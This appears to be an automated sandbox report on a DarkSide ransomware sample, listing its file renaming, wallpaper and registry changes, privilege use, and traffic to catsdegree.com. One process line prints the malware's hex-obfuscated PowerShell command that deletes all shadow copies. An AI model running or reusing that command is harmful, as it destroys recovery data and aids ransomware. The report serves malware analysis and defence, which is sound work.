N/A 8.8.8.8:53 178.0.7.10.in-addr.arpa udp
N/A 72.52.178.23:443 catsdegree.com tcp

Files

memory/2004-60-0x0000000075B31000-0x0000000075B33000-memory.dmp

memory/1752-61-0x0000000000000000-mapping.dmp

memory/1752-62-0x000007FEFC391000-0x000007FEFC393000-memory.dmp

memory/1752-63-0x00000000022E0000-0x00000000022E1000-memory.dmp

memory/1752-64-0x000000001AB90000-0x000000001AB91000-memory.dmp

memory/1752-65-0x000000001AA50000-0x000000001AA51000-memory.dmp

memory/1752-66-0x000000001AB10000-0x000000001AB12000-memory.dmp

memory/1752-67-0x000000001AB14000-0x000000001AB16000-memory.dmp

memory/1752-68-0x0000000002440000-0x0000000002441000-memory.dmp

memory/1752-69-0x000000001B6C0000-0x000000001B6C1000-memory.dmp

memory/1752-70-0x000000001AA80000-0x000000001AA81000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 46864d7c73339c24088695ab6540998e
SHA1 6e7fad85cd59fd5df5cdb1b7a44f65bd4bd3382a
SHA256 a0f81079f99a77be9f11dc85365388979321bebff63fdb3755e95ff1b26bb60b
SHA512 de484be172c59a0a4cbd92ff38e10734c0bf3fa7e1a415a5d2ad1ad49e67bd26c0e68005c4d61763290afd3916c3561851f7b788d954ff80d29aef969c1af6f9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1ab751534b52d9fce32646a066bff4c9
SHA1 6eebc51e2b1b5beb94ec3c435770cf212df57b95
SHA256 ac022b98fd2114f5ceda4fd0c3c7c5e740da698edc12074158d4b8f0368bad93
SHA512 78fdeb1d07e3271c90f8b90eec6f34caf9f0e2858b4d833f0f1c707c3bd05bcdebcc958fdc84d14d838e9746fe38bc3a8decbc82fe905aa1cef779f1f5827b74

Analysis: behavioral2

Detonation Overview

Submitted

2021-08-31 07:27

Reported

2021-08-31 07:30

Platform

win10v20210408

Max time kernel

40s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\RedoConvertTo.tif.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\SetFormat.png.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnprotectResolve.tiff C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnprotectResolve.tiff.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\UpdateRepair.tif => C:\Users\Admin\Pictures\UpdateRepair.tif.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\FormatSplit.raw.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\SetFormat.png => C:\Users\Admin\Pictures\SetFormat.png.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\UpdateRepair.tif.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\FormatSplit.raw => C:\Users\Admin\Pictures\FormatSplit.raw.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\UnprotectResolve.tiff => C:\Users\Admin\Pictures\UnprotectResolve.tiff.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExportDeny.tiff C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\ExportDeny.tiff => C:\Users\Admin\Pictures\ExportDeny.tiff.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExportDeny.tiff.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\RedoConvertTo.tif => C:\Users\Admin\Pictures\RedoConvertTo.tif.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\21b2020d.BMP" C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\21b2020d.BMP" C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d\ = "21b2020d" C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\21b2020d.ico" C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe

"C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 catsdegree.com udp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 8.8.8.8:53 1.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 61.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 63.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 55.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 54.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 51.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 50.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 49.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 53.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 52.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 78.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 76.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 56.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 57.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 60.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 62.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 65.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 64.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 66.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 71.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 72.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 70.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 80.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 79.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 81.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 82.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 44.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 47.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 45.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 43.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 39.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 58.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 83.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 59.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 35.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 36.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 29.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 32.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 30.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 27.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 23.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 25.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 22.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 20.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 17.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 16.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 15.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 12.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 40.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 11.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 8.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 6.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 10.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 115.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 112.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 107.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 108.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 104.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 103.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 102.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 101.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 99.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 100.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 98.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 96.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 95.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 94.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 91.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 90.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 89.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 7.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 3.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 9.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 14.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 13.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 18.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 19.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 26.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 24.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 28.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 31.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 34.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 33.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 37.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 38.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 42.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 41.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 46.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 48.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 85.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 84.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 77.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 74.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 75.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 73.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 69.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 68.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 67.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 87.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 88.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 128.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 127.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 125.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 123.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 122.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 119.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 118.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 117.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 116.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 120.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 121.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 126.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 110.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 109.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 5.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 4.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 2.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 92.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 86.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 93.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 97.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 105.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 106.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 111.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 114.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 113.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 182.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 169.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 161.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 159.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 148.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 139.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 129.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 133.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 130.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 131.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 132.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 134.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 135.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 136.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 137.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 138.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 140.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 144.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 141.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 142.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 143.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 145.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 150.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 147.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 149.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 151.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 152.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 153.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 154.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 155.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 156.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 157.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 146.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 160.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 165.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 166.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 167.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 168.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 170.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 171.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 174.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 172.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 173.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 176.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 175.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 177.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 179.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 178.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 180.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 181.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 183.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 162.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 163.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 158.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 164.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 185.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 252.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 186.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 187.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 188.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 193.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 203.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 210.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 219.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 229.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 226.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 231.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 232.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 234.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 237.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 243.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 247.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 253.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 184.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 250.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 254.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 249.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 248.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 245.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 246.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 244.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 242.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 239.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 238.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 236.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 235.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 233.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 230.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 228.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 227.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 225.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 224.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 223.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 222.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 221.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 220.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 218.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 217.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 216.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 215.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 214.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 212.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 213.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 209.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 211.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 208.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 207.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 205.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 206.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 204.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 201.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 200.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 202.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 199.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 198.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 197.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 196.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 195.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 194.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 192.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 191.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 190.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 189.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 240.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 241.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 251.0.10.10.in-addr.arpa udp
N/A 72.52.178.23:443 catsdegree.com tcp

Files

memory/1908-114-0x0000000000000000-mapping.dmp

memory/1908-118-0x000001E938210000-0x000001E938212000-memory.dmp

memory/1908-120-0x000001E938213000-0x000001E938215000-memory.dmp

memory/1908-121-0x000001E9382B0000-0x000001E9382B1000-memory.dmp

memory/1908-124-0x000001E950980000-0x000001E950981000-memory.dmp

memory/1908-133-0x000001E938216000-0x000001E938218000-memory.dmp

